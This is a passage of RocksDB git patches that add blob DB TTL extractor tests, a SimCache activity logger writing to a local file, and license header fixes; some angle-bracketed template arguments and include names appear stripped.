ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); + ASSERT_EQ(100 - data.size(), gc_stats.num_deletes); + ASSERT_EQ(data.size(), gc_stats.num_relocs); + VerifyDB(data); +} + +TEST_F(BlobDBTest, PutUntil) { + Random rnd(301); + Options options; + options.env = mock_env_.get(); + BlobDBOptionsImpl bdb_options; + bdb_options.ttl_range_secs = 1000; + bdb_options.blob_file_size = 256 * 1000 * 1000; + bdb_options.disable_background_tasks = true; + Open(bdb_options, options); + std::map data; + mock_env_->set_now_micros(50 * 1000000); + for (size_t i = 0; i < 100; i++) { + int32_t expiration = rnd.Next() % 100 + 50; + PutRandomUntil("key" + ToString(i), expiration, &rnd, + (expiration < 100 ? 
nullptr : &data)); + } + mock_env_->set_now_micros(100 * 1000000); + auto *bdb_impl = static_cast(blob_db_); + auto blob_files = bdb_impl->TEST_GetBlobFiles(); + ASSERT_EQ(1, blob_files.size()); + ASSERT_TRUE(blob_files[0]->HasTTL()); + bdb_impl->TEST_CloseBlobFile(blob_files[0]); + GCStats gc_stats; + ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); + ASSERT_EQ(100 - data.size(), gc_stats.num_deletes); + ASSERT_EQ(data.size(), gc_stats.num_relocs); + VerifyDB(data); +} + +TEST_F(BlobDBTest, TTLExtrator_NoTTL) { + // The default ttl extractor return no ttl for every key. + ttl_extractor_.reset(new TTLExtractor()); + Random rnd(301); + Options options; + options.env = mock_env_.get(); + BlobDBOptionsImpl bdb_options; + bdb_options.ttl_range_secs = 1000; + bdb_options.blob_file_size = 256 * 1000 * 1000; + bdb_options.num_concurrent_simple_blobs = 1; + bdb_options.ttl_extractor = ttl_extractor_; + bdb_options.disable_background_tasks = true; + Open(bdb_options, options); + std::map data; + mock_env_->set_now_micros(0); + for (size_t i = 0; i < 100; i++) { + PutRandom("key" + ToString(i), &rnd, &data); + } + // very far in the future.. + mock_env_->set_now_micros(std::numeric_limits::max() - 10); + auto *bdb_impl = static_cast(blob_db_); + auto blob_files = bdb_impl->TEST_GetBlobFiles(); + ASSERT_EQ(1, blob_files.size()); + ASSERT_FALSE(blob_files[0]->HasTTL()); + bdb_impl->TEST_CloseBlobFile(blob_files[0]); + GCStats gc_stats; + ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); + ASSERT_EQ(0, gc_stats.num_deletes); + ASSERT_EQ(100, gc_stats.num_relocs); + VerifyDB(data); +} + +TEST_F(BlobDBTest, TTLExtractor_ExtractTTL) { + Random rnd(301); + class TestTTLExtractor : public TTLExtractor { + public: + explicit TestTTLExtractor(Random *r) : rnd(r) {} + + virtual bool ExtractTTL(const Slice &key, const Slice &value, uint64_t *ttl, + std::string * /*new_value*/, + bool * /*value_changed*/) override { + *ttl = rnd->Next() % 100; + if (*ttl >= 50) { + data[key.ToString()] = value.ToString(); + } + return true; + } + + Random *rnd; + std::map data; + }; + ttl_extractor_.reset(new TestTTLExtractor(&rnd)); + Options options; + options.env = mock_env_.get(); + BlobDBOptionsImpl bdb_options; + bdb_options.ttl_range_secs = 1000; + bdb_options.blob_file_size = 256 * 1000 * 1000; + bdb_options.ttl_extractor = ttl_extractor_; + bdb_options.disable_background_tasks = true; + Open(bdb_options, options); + mock_env_->set_now_micros(50 * 1000000); + for (size_t i = 0; i < 100; i++) { + PutRandom("key" + ToString(i), &rnd); + } + mock_env_->set_now_micros(100 * 1000000); + auto *bdb_impl = static_cast(blob_db_); + auto blob_files = bdb_impl->TEST_GetBlobFiles(); + ASSERT_EQ(1, blob_files.size()); + ASSERT_TRUE(blob_files[0]->HasTTL()); + bdb_impl->TEST_CloseBlobFile(blob_files[0]); + GCStats gc_stats; + ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); + auto &data = static_cast(ttl_extractor_.get())->data; + ASSERT_EQ(100 - data.size(), gc_stats.num_deletes); + ASSERT_EQ(data.size(), gc_stats.num_relocs); + VerifyDB(data); +} + +TEST_F(BlobDBTest, TTLExtractor_ExtractExpiration) { + Random rnd(301); + class TestTTLExtractor : public TTLExtractor { + public: + explicit TestTTLExtractor(Random *r) : rnd(r) {} + + virtual bool ExtractExpiration(const Slice &key, const Slice &value, + uint64_t /*now*/, uint64_t *expiration, + std::string * /*new_value*/, + bool * /*value_changed*/) override { + *expiration = rnd->Next() % 100 + 50; + if (*expiration 
>= 100) { + data[key.ToString()] = value.ToString(); + } + return true; + } + + Random *rnd; + std::map data; + }; + ttl_extractor_.reset(new TestTTLExtractor(&rnd)); + Options options; + options.env = mock_env_.get(); + BlobDBOptionsImpl bdb_options; + bdb_options.ttl_range_secs = 1000; + bdb_options.blob_file_size = 256 * 1000 * 1000; + bdb_options.ttl_extractor = ttl_extractor_; + bdb_options.disable_background_tasks = true; + Open(bdb_options, options); + mock_env_->set_now_micros(50 * 1000000); + for (size_t i = 0; i < 100; i++) { + PutRandom("key" + ToString(i), &rnd); + } + mock_env_->set_now_micros(100 * 1000000); + auto *bdb_impl = static_cast(blob_db_); + auto blob_files = bdb_impl->TEST_GetBlobFiles(); + ASSERT_EQ(1, blob_files.size()); + ASSERT_TRUE(blob_files[0]->HasTTL()); + bdb_impl->TEST_CloseBlobFile(blob_files[0]); + GCStats gc_stats; + ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); + auto &data = static_cast(ttl_extractor_.get())->data; + ASSERT_EQ(100 - data.size(), gc_stats.num_deletes); + ASSERT_EQ(data.size(), gc_stats.num_relocs); + VerifyDB(data); +} + +TEST_F(BlobDBTest, TTLExtractor_ChangeValue) { + class TestTTLExtractor : public TTLExtractor { + public: + const Slice kTTLSuffix = Slice("ttl:"); + + bool ExtractTTL(const Slice & /*key*/, const Slice &value, uint64_t *ttl, + std::string *new_value, bool *value_changed) override { + if (value.size() < 12) { + return false; + } + const char *p = value.data() + value.size() - 12; + if (kTTLSuffix != Slice(p, 4)) { + return false; + } + *ttl = DecodeFixed64(p + 4); + *new_value = Slice(value.data(), value.size() - 12).ToString(); + *value_changed = true; + return true; + } + }; + Random rnd(301); + Options options; + options.env = mock_env_.get(); + BlobDBOptionsImpl bdb_options; + bdb_options.ttl_range_secs = 1000; + bdb_options.blob_file_size = 256 * 1000 * 1000; + bdb_options.ttl_extractor = std::make_shared(); + bdb_options.disable_background_tasks = true; + Open(bdb_options, options); + std::map data; + mock_env_->set_now_micros(50 * 1000000); + for (size_t i = 0; i < 100; i++) { + int len = rnd.Next() % kMaxBlobSize + 1; + std::string key = "key" + ToString(i); + std::string value = test::RandomHumanReadableString(&rnd, len); + uint64_t ttl = rnd.Next() % 100; + std::string value_ttl = value + "ttl:"; + PutFixed64(&value_ttl, ttl); + ASSERT_OK(blob_db_->Put(WriteOptions(), Slice(key), Slice(value_ttl))); + if (ttl >= 50) { + data[key] = value; + } + } + mock_env_->set_now_micros(100 * 1000000); + auto *bdb_impl = static_cast(blob_db_); + auto blob_files = bdb_impl->TEST_GetBlobFiles(); + ASSERT_EQ(1, blob_files.size()); + ASSERT_TRUE(blob_files[0]->HasTTL()); + bdb_impl->TEST_CloseBlobFile(blob_files[0]); + GCStats gc_stats; + ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); + ASSERT_EQ(100 - data.size(), gc_stats.num_deletes); + ASSERT_EQ(data.size(), gc_stats.num_relocs); + VerifyDB(data); +} + TEST_F(BlobDBTest, StackableDBGet) { Random rnd(301); BlobDBOptionsImpl bdb_options; diff --git a/utilities/blob_db/blob_log_format.h b/utilities/blob_db/blob_log_format.h index b56cf205cc2..f4e62fe2d96 100644 --- a/utilities/blob_db/blob_log_format.h +++ b/utilities/blob_db/blob_log_format.h @@ -11,6 +11,7 @@ #include #include +#include #include #include #include @@ -229,6 +230,10 @@ class BlobLogRecord { uint64_t GetBlobSize() const { return blob_size_; } + bool HasTTL() const { + return ttl_val_ != std::numeric_limits::max(); + } + uint32_t GetTTL() const { return 
ttl_val_; } uint64_t GetTimeVal() const { return time_val_; } diff --git a/utilities/blob_db/ttl_extractor.cc b/utilities/blob_db/ttl_extractor.cc new file mode 100644 index 00000000000..735b2f30fb7 --- /dev/null +++ b/utilities/blob_db/ttl_extractor.cc @@ -0,0 +1,31 @@ +// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). +#include "ttl_extractor.h" + +#include "util/coding.h" + +namespace rocksdb { +namespace blob_db { + +bool TTLExtractor::ExtractTTL(const Slice& /*key*/, const Slice& /*value*/, + uint64_t* /*ttl*/, std::string* /*new_value*/, + bool* /*value_changed*/) { + return false; +} + +bool TTLExtractor::ExtractExpiration(const Slice& key, const Slice& value, + uint64_t now, uint64_t* expiration, + std::string* new_value, + bool* value_changed) { + uint64_t ttl; + bool has_ttl = ExtractTTL(key, value, &ttl, new_value, value_changed); + if (has_ttl) { + *expiration = now + ttl; + } + return has_ttl; +} + +} // namespace blob_db +} // namespace rocksdb diff --git a/utilities/blob_db/ttl_extractor.h b/utilities/blob_db/ttl_extractor.h new file mode 100644 index 00000000000..51df944511e --- /dev/null +++ b/utilities/blob_db/ttl_extractor.h @@ -0,0 +1,43 @@ +// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). +#pragma once + +#include +#include + +#include "rocksdb/slice.h" + +namespace rocksdb { +namespace blob_db { + +// TTLExtractor allow applications to extract TTL from key-value pairs. +// This useful for applications using Put or WriteBatch to write keys and +// don't intend to migrate to PutWithTTL or PutUntil. +// +// Applications can implement either ExtractTTL or ExtractExpiration. If both +// are implemented, ExtractExpiration will take precedence. +class TTLExtractor { + public: + // Extract TTL from key-value pair. + // Return true if the key has TTL, false otherwise. If key has TTL, + // TTL is pass back through ttl. The method can optionally modify the value, + // pass the result back through new_value, and also set value_changed to true. + virtual bool ExtractTTL(const Slice& key, const Slice& value, uint64_t* ttl, + std::string* new_value, bool* value_changed); + + // Extract expiration time from key-value pair. + // Return true if the key has expiration time, false otherwise. If key has + // expiration time, it is pass back through expiration. The method can + // optionally modify the value, pass the result back through new_value, + // and also set value_changed to true. + virtual bool ExtractExpiration(const Slice& key, const Slice& value, + uint64_t now, uint64_t* expiration, + std::string* new_value, bool* value_changed); + + virtual ~TTLExtractor() = default; +}; + +} // namespace blob_db +} // namespace rocksdb From 50a969131f69ffab6f7a694b3b897a7235e899fa Mon Sep 17 00:00:00 2001 From: Islam AbdelRahman Date: Fri, 28 Jul 2017 12:18:09 -0700 Subject: [PATCH 057/205] CacheActivityLogger, component to log cache activity into a file Summary: Simple component that will add a new entry in a log file every time we lookup/insert a key in SimCache. 
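For concreteness, a hedged usage sketch ahead of the API listing below; the file path and cache sizes here are made up, and the calls mirror the sim_cache_test.cc diff later in this patch:
```cpp
// Sketch: wrap a real LRU block cache in a SimCache, log its activity
// for one workload, then inspect the background status.
std::shared_ptr<rocksdb::SimCache> sim_cache = rocksdb::NewSimCache(
    rocksdb::NewLRUCache(1 << 20) /* real cache */,
    20 << 20 /* simulated capacity */, 0 /* num_shard_bits */);
// ... install sim_cache as BlockBasedTableOptions::block_cache, open the DB ...

rocksdb::Status s = sim_cache->StartActivityLogging(
    "/tmp/cache_log.txt", rocksdb::Env::Default(), 0 /* no size limit */);
// ... run the workload to be analyzed ...
sim_cache->StopActivityLogging();
s = sim_cache->GetActivityLoggingStatus();  // surfaces background write errors
```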
API: ``` SimCache::StartActivityLogging(, , ) SimCache::StopActivityLogging() ``` Sending for review; still need to add more comments. I was thinking about a better approach, but I ended up deciding I will use a mutex to sync the writes to the file, since this feature should not be heavily used and is only meant to collect info that will be analyzed offline. I think it's okay to hold the mutex every time we lookup/add to the SimCache. Closes https://github.com/facebook/rocksdb/pull/2295 Differential Revision: D5063826 Pulled By: IslamAbdelRahman fbshipit-source-id: f3b5daed8b201987c9a071146ddd5c5740a2dd8c --- CMakeLists.txt | 1 + include/rocksdb/utilities/sim_cache.h | 14 ++ utilities/simulator_cache/sim_cache.cc | 157 ++++++++++++++++++ utilities/simulator_cache/sim_cache_test.cc | 71 +++++++++ 4 files changed, 243 insertions(+) diff --git a/CMakeLists.txt b/CMakeLists.txt index 2fede71c026..00756e8e3ad 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -727,6 +727,7 @@ set(TESTS utilities/persistent_cache/persistent_cache_test.cc utilities/redis/redis_lists_test.cc utilities/spatialdb/spatial_db_test.cc + utilities/simulator_cache/sim_cache_test.cc utilities/table_properties_collectors/compact_on_deletion_collector_test.cc utilities/transactions/optimistic_transaction_test.cc utilities/transactions/transaction_test.cc diff --git a/include/rocksdb/utilities/sim_cache.h b/include/rocksdb/utilities/sim_cache.h index 60c73ec5d50..f29fd5e8f68 100644 --- a/include/rocksdb/utilities/sim_cache.h +++ b/include/rocksdb/utilities/sim_cache.h @@ -9,6 +9,7 @@ #include #include #include "rocksdb/cache.h" +#include "rocksdb/env.h" #include "rocksdb/slice.h" #include "rocksdb/statistics.h" #include "rocksdb/status.h" @@ -67,6 +68,19 @@ class SimCache : public Cache { // String representation of the statistics of the simcache virtual std::string ToString() const = 0; + // Start storing logs of the cache activity (Add/Lookup) into + // a file located at activity_log_file, max_logging_size option can be used to + // stop logging to the file automatically after reaching a specific size in + // bytes, a value of 0 disables this feature + virtual Status StartActivityLogging(const std::string& activity_log_file, + Env* env, uint64_t max_logging_size = 0) = 0; + + // Stop cache activity logging if any + virtual void StopActivityLogging() = 0; + + // Status of cache logging happening in background + virtual Status GetActivityLoggingStatus() = 0; + private: SimCache(const SimCache&); SimCache& operator=(const SimCache&); diff --git a/utilities/simulator_cache/sim_cache.cc b/utilities/simulator_cache/sim_cache.cc index 335ac9896d0..e3d8016579e 100644 --- a/utilities/simulator_cache/sim_cache.cc +++ b/utilities/simulator_cache/sim_cache.cc @@ -7,10 +7,144 @@ #include #include "monitoring/statistics.h" #include "port/port.h" +#include "rocksdb/env.h" +#include "util/file_reader_writer.h" +#include "util/mutexlock.h" +#include "util/string_util.h" namespace rocksdb { namespace { + +class CacheActivityLogger { + public: + CacheActivityLogger() + : activity_logging_enabled_(false), max_logging_size_(0) {} + + ~CacheActivityLogger() { + MutexLock l(&mutex_); + + StopLoggingInternal(); + } + + Status StartLogging(const std::string& activity_log_file, Env* env, + uint64_t max_logging_size = 0) { + assert(activity_log_file != ""); + assert(env != nullptr); + + Status status; + EnvOptions env_opts; + std::unique_ptr log_file; + + MutexLock l(&mutex_); + + // Stop existing logging if any + StopLoggingInternal(); + + // Open
log file + status = env->NewWritableFile(activity_log_file, &log_file, env_opts); + if (!status.ok()) { + return status; + } + file_writer_.reset(new WritableFileWriter(std::move(log_file), env_opts)); + + max_logging_size_ = max_logging_size; + activity_logging_enabled_.store(true); + + return status; + } + + void StopLogging() { + MutexLock l(&mutex_); + + StopLoggingInternal(); + } + + void ReportLookup(const Slice& key) { + if (activity_logging_enabled_.load() == false) { + return; + } + + std::string log_line = "LOOKUP - " + key.ToString(true) + "\n"; + + // line format: "LOOKUP - " + MutexLock l(&mutex_); + Status s = file_writer_->Append(log_line); + if (!s.ok() && bg_status_.ok()) { + bg_status_ = s; + } + if (MaxLoggingSizeReached() || !bg_status_.ok()) { + // Stop logging if we have reached the max file size or + // encountered an error + StopLoggingInternal(); + } + } + + void ReportAdd(const Slice& key, size_t size) { + if (activity_logging_enabled_.load() == false) { + return; + } + + std::string log_line = "ADD - "; + log_line += key.ToString(true); + log_line += " - "; + AppendNumberTo(&log_line, size); + log_line += "\n"; + + // line format: "ADD - - " + MutexLock l(&mutex_); + Status s = file_writer_->Append(log_line); + if (!s.ok() && bg_status_.ok()) { + bg_status_ = s; + } + + if (MaxLoggingSizeReached() || !bg_status_.ok()) { + // Stop logging if we have reached the max file size or + // encountered an error + StopLoggingInternal(); + } + } + + Status& bg_status() { + MutexLock l(&mutex_); + return bg_status_; + } + + private: + bool MaxLoggingSizeReached() { + mutex_.AssertHeld(); + + return (max_logging_size_ > 0 && + file_writer_->GetFileSize() >= max_logging_size_); + } + + void StopLoggingInternal() { + mutex_.AssertHeld(); + + if (!activity_logging_enabled_) { + return; + } + + activity_logging_enabled_.store(false); + Status s = file_writer_->Close(); + if (!s.ok() && bg_status_.ok()) { + bg_status_ = s; + } + } + + // Mutex to sync writes to file_writer, and all following + // class data members + port::Mutex mutex_; + // Indicates if logging is currently enabled + // atomic to allow reads without mutex + std::atomic activity_logging_enabled_; + // When reached, we will stop logging and close the file + // Value of 0 means unlimited + uint64_t max_logging_size_; + std::unique_ptr file_writer_; + Status bg_status_; +}; + // SimCacheImpl definition class SimCacheImpl : public SimCache { public: @@ -48,6 +182,9 @@ class SimCacheImpl : public SimCache { } else { key_only_cache_->Release(h); } + + cache_activity_logger_.ReportAdd(key, charge); + return cache_->Insert(key, value, charge, deleter, handle, priority); } @@ -61,6 +198,9 @@ class SimCacheImpl : public SimCache { inc_miss_counter(); RecordTick(stats, SIM_BLOCK_CACHE_MISS); } + + cache_activity_logger_.ReportLookup(key); + return cache_->Lookup(key, stats); } @@ -158,12 +298,29 @@ class SimCacheImpl : public SimCache { return ret; } + virtual Status StartActivityLogging(const std::string& activity_log_file, + Env* env, + uint64_t max_logging_size = 0) override { + return cache_activity_logger_.StartLogging(activity_log_file, env, + max_logging_size); + } + + virtual void StopActivityLogging() override { + cache_activity_logger_.StopLogging(); + } + + virtual Status GetActivityLoggingStatus() override { + return cache_activity_logger_.bg_status(); + } + private: std::shared_ptr cache_; std::shared_ptr key_only_cache_; std::atomic miss_times_; std::atomic hit_times_; Statistics* stats_; + CacheActivityLogger 
cache_activity_logger_; + void inc_miss_counter() { miss_times_.fetch_add(1, std::memory_order_relaxed); } diff --git a/utilities/simulator_cache/sim_cache_test.cc b/utilities/simulator_cache/sim_cache_test.cc index 01b328c783e..4c175c94775 100644 --- a/utilities/simulator_cache/sim_cache_test.cc +++ b/utilities/simulator_cache/sim_cache_test.cc @@ -138,6 +138,77 @@ TEST_F(SimCacheTest, SimCache) { ASSERT_EQ(6, simCache->get_hit_counter()); } +TEST_F(SimCacheTest, SimCacheLogging) { + auto table_options = GetTableOptions(); + auto options = GetOptions(table_options); + options.disable_auto_compactions = true; + std::shared_ptr sim_cache = + NewSimCache(NewLRUCache(1024 * 1024), 20000, 0); + table_options.block_cache = sim_cache; + options.table_factory.reset(new BlockBasedTableFactory(table_options)); + Reopen(options); + + int num_block_entries = 20; + for (int i = 0; i < num_block_entries; i++) { + Put(Key(i), "val"); + Flush(); + } + + std::string log_file = test::TmpDir(env_) + "/cache_log.txt"; + ASSERT_OK(sim_cache->StartActivityLogging(log_file, env_)); + for (int i = 0; i < num_block_entries; i++) { + ASSERT_EQ(Get(Key(i)), "val"); + } + for (int i = 0; i < num_block_entries; i++) { + ASSERT_EQ(Get(Key(i)), "val"); + } + sim_cache->StopActivityLogging(); + ASSERT_OK(sim_cache->GetActivityLoggingStatus()); + + std::string file_contents = ""; + ReadFileToString(env_, log_file, &file_contents); + + int lookup_num = 0; + int add_num = 0; + std::string::size_type pos; + + // count number of lookups + pos = 0; + while ((pos = file_contents.find("LOOKUP -", pos)) != std::string::npos) { + ++lookup_num; + pos += 1; + } + + // count number of additions + pos = 0; + while ((pos = file_contents.find("ADD -", pos)) != std::string::npos) { + ++add_num; + pos += 1; + } + + // We asked for every block twice + ASSERT_EQ(lookup_num, num_block_entries * 2); + + // We added every block only once, since the cache can hold all blocks + ASSERT_EQ(add_num, num_block_entries); + + // Log things again but stop logging automatically after reaching 512 bytes + int max_size = 512; + ASSERT_OK(sim_cache->StartActivityLogging(log_file, env_, max_size)); + for (int it = 0; it < 10; it++) { + for (int i = 0; i < num_block_entries; i++) { + ASSERT_EQ(Get(Key(i)), "val"); + } + } + ASSERT_OK(sim_cache->GetActivityLoggingStatus()); + + uint64_t fsize = 0; + ASSERT_OK(env_->GetFileSize(log_file, &fsize)); + // error margin of 100 bytes + ASSERT_LT(fsize, max_size + 100); + ASSERT_GT(fsize, max_size - 100); +} + } // namespace rocksdb int main(int argc, char** argv) { From aace46516bd0b72a05273246d0e97286bad26236 Mon Sep 17 00:00:00 2001 From: Sagar Vemuri Date: Fri, 28 Jul 2017 13:55:19 -0700 Subject: [PATCH 058/205] Fix license headers in Cassandra related files Summary: I might have missed these while doing some recent cassandra code reviews. 
Closes https://github.com/facebook/rocksdb/pull/2663 Differential Revision: D5520138 Pulled By: sagar0 fbshipit-source-id: 340930afe9efe03c75f535a1da1f89bd3e53c1f9 --- include/rocksdb/utilities/debug.h | 4 +--- java/rocksjni/cassandra_value_operator.cc | 4 +--- .../java/org/rocksdb/CassandraCompactionFilter.java | 8 ++++---- .../java/org/rocksdb/CassandraValueMergeOperator.java | 4 +--- utilities/cassandra/merge_operator.cc | 4 +--- utilities/cassandra/merge_operator.h | 4 +--- utilities/cassandra/serialize.h | 4 +--- utilities/cassandra/test_utils.cc | 10 ++++------ utilities/cassandra/test_utils.h | 4 +--- 9 files changed, 15 insertions(+), 31 deletions(-) diff --git a/include/rocksdb/utilities/debug.h b/include/rocksdb/utilities/debug.h index f29fa045cba..3e325f69a09 100644 --- a/include/rocksdb/utilities/debug.h +++ b/include/rocksdb/utilities/debug.h @@ -1,9 +1,7 @@ -// Copyright (c) 2017-present, Facebook, Inc. All rights reserved. +// Copyright (c) 2017-present, Facebook, Inc. All rights reserved. // This source code is licensed under both the GPLv2 (found in the // COPYING file in the root directory) and Apache 2.0 License // (found in the LICENSE.Apache file in the root directory). -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. #pragma once diff --git a/java/rocksjni/cassandra_value_operator.cc b/java/rocksjni/cassandra_value_operator.cc index 6be6614075a..aa58eccc24a 100644 --- a/java/rocksjni/cassandra_value_operator.cc +++ b/java/rocksjni/cassandra_value_operator.cc @@ -1,9 +1,7 @@ -// Copyright (c) 2017-present, Facebook, Inc. All rights reserved. +// Copyright (c) 2017-present, Facebook, Inc. All rights reserved. // This source code is licensed under both the GPLv2 (found in the // COPYING file in the root directory) and Apache 2.0 License // (found in the LICENSE.Apache file in the root directory). -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. #include #include diff --git a/java/src/main/java/org/rocksdb/CassandraCompactionFilter.java b/java/src/main/java/org/rocksdb/CassandraCompactionFilter.java index 05d9aabcf00..26bf3588355 100644 --- a/java/src/main/java/org/rocksdb/CassandraCompactionFilter.java +++ b/java/src/main/java/org/rocksdb/CassandraCompactionFilter.java @@ -1,7 +1,7 @@ -// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// Copyright (c) 2017-present, Facebook, Inc. All rights reserved. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/CassandraValueMergeOperator.java b/java/src/main/java/org/rocksdb/CassandraValueMergeOperator.java index 55d67a3a375..a09556a2b8d 100644 --- a/java/src/main/java/org/rocksdb/CassandraValueMergeOperator.java +++ b/java/src/main/java/org/rocksdb/CassandraValueMergeOperator.java @@ -1,9 +1,7 @@ -// Copyright (c) 2017-present, Facebook, Inc. All rights reserved. +// Copyright (c) 2017-present, Facebook, Inc. All rights reserved. 
// This source code is licensed under both the GPLv2 (found in the // COPYING file in the root directory) and Apache 2.0 License // (found in the LICENSE.Apache file in the root directory). -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. package org.rocksdb; diff --git a/utilities/cassandra/merge_operator.cc b/utilities/cassandra/merge_operator.cc index 75817a78b28..3c9cb7f740b 100644 --- a/utilities/cassandra/merge_operator.cc +++ b/utilities/cassandra/merge_operator.cc @@ -1,9 +1,7 @@ -// Copyright (c) 2017-present, Facebook, Inc. All rights reserved. +// Copyright (c) 2017-present, Facebook, Inc. All rights reserved. // This source code is licensed under both the GPLv2 (found in the // COPYING file in the root directory) and Apache 2.0 License // (found in the LICENSE.Apache file in the root directory). -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. #include "merge_operator.h" diff --git a/utilities/cassandra/merge_operator.h b/utilities/cassandra/merge_operator.h index b46662c26d8..edbf120015f 100644 --- a/utilities/cassandra/merge_operator.h +++ b/utilities/cassandra/merge_operator.h @@ -1,9 +1,7 @@ -// Copyright (c) 2017-present, Facebook, Inc. All rights reserved. +// Copyright (c) 2017-present, Facebook, Inc. All rights reserved. // This source code is licensed under both the GPLv2 (found in the // COPYING file in the root directory) and Apache 2.0 License // (found in the LICENSE.Apache file in the root directory). -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. #pragma once #include "rocksdb/merge_operator.h" diff --git a/utilities/cassandra/serialize.h b/utilities/cassandra/serialize.h index 0e35d34af00..64ccd4c29f0 100644 --- a/utilities/cassandra/serialize.h +++ b/utilities/cassandra/serialize.h @@ -1,9 +1,7 @@ -// Copyright (c) 2017-present, Facebook, Inc. All rights reserved. +// Copyright (c) 2017-present, Facebook, Inc. All rights reserved. // This source code is licensed under both the GPLv2 (found in the // COPYING file in the root directory) and Apache 2.0 License // (found in the LICENSE.Apache file in the root directory). -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. /** * Helper functions which serialize and deserialize integers diff --git a/utilities/cassandra/test_utils.cc b/utilities/cassandra/test_utils.cc index 68d0381e0e5..61f53b2d375 100644 --- a/utilities/cassandra/test_utils.cc +++ b/utilities/cassandra/test_utils.cc @@ -1,9 +1,7 @@ -// Copyright (c) 2017-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// Copyright (c) 2017-present, Facebook, Inc. All rights reserved. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). 
#include "test_utils.h" diff --git a/utilities/cassandra/test_utils.h b/utilities/cassandra/test_utils.h index 7ca6cfd6146..463b12bf283 100644 --- a/utilities/cassandra/test_utils.h +++ b/utilities/cassandra/test_utils.h @@ -1,9 +1,7 @@ -// Copyright (c) 2017-present, Facebook, Inc. All rights reserved. +// Copyright (c) 2017-present, Facebook, Inc. All rights reserved. // This source code is licensed under both the GPLv2 (found in the // COPYING file in the root directory) and Apache 2.0 License // (found in the LICENSE.Apache file in the root directory). -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. #pragma once #include From aaf42fe77508735b36a412eb4c183df58e8a54cd Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Fri, 28 Jul 2017 14:21:38 -0700 Subject: [PATCH 059/205] Move blob_db/ttl_extractor.h into blob_db/blob_db.h Summary: Move blob_db/ttl_extractor.h into blob_db/blob_db.h Also exclude TTLExtractor from LITE build. Closes https://github.com/facebook/rocksdb/pull/2665 Differential Revision: D5520009 Pulled By: yiwu-arbug fbshipit-source-id: 4813dcc272c7cc4bf2cdac285256d9a17d78c7b7 --- utilities/blob_db/blob_db.h | 30 ++++++++++++++++++++- utilities/blob_db/ttl_extractor.cc | 5 +++- utilities/blob_db/ttl_extractor.h | 43 ------------------------------ 3 files changed, 33 insertions(+), 45 deletions(-) delete mode 100644 utilities/blob_db/ttl_extractor.h diff --git a/utilities/blob_db/blob_db.h b/utilities/blob_db/blob_db.h index dfb21383dda..e68b40a0ac7 100644 --- a/utilities/blob_db/blob_db.h +++ b/utilities/blob_db/blob_db.h @@ -13,12 +13,13 @@ #include "rocksdb/db.h" #include "rocksdb/status.h" #include "rocksdb/utilities/stackable_db.h" -#include "utilities/blob_db/ttl_extractor.h" namespace rocksdb { namespace blob_db { +class TTLExtractor; + // A wrapped database which puts values of KV pairs in a separate log // and store location to the log in the underlying DB. // It lacks lots of importatant functionalities, e.g. DB restarts, @@ -188,6 +189,33 @@ class BlobDB : public StackableDB { Status DestroyBlobDB(const std::string& dbname, const Options& options, const BlobDBOptions& bdb_options); +// TTLExtractor allow applications to extract TTL from key-value pairs. +// This useful for applications using Put or WriteBatch to write keys and +// don't intend to migrate to PutWithTTL or PutUntil. +// +// Applications can implement either ExtractTTL or ExtractExpiration. If both +// are implemented, ExtractExpiration will take precedence. +class TTLExtractor { + public: + // Extract TTL from key-value pair. + // Return true if the key has TTL, false otherwise. If key has TTL, + // TTL is pass back through ttl. The method can optionally modify the value, + // pass the result back through new_value, and also set value_changed to true. + virtual bool ExtractTTL(const Slice& key, const Slice& value, uint64_t* ttl, + std::string* new_value, bool* value_changed); + + // Extract expiration time from key-value pair. + // Return true if the key has expiration time, false otherwise. If key has + // expiration time, it is pass back through expiration. The method can + // optionally modify the value, pass the result back through new_value, + // and also set value_changed to true. 
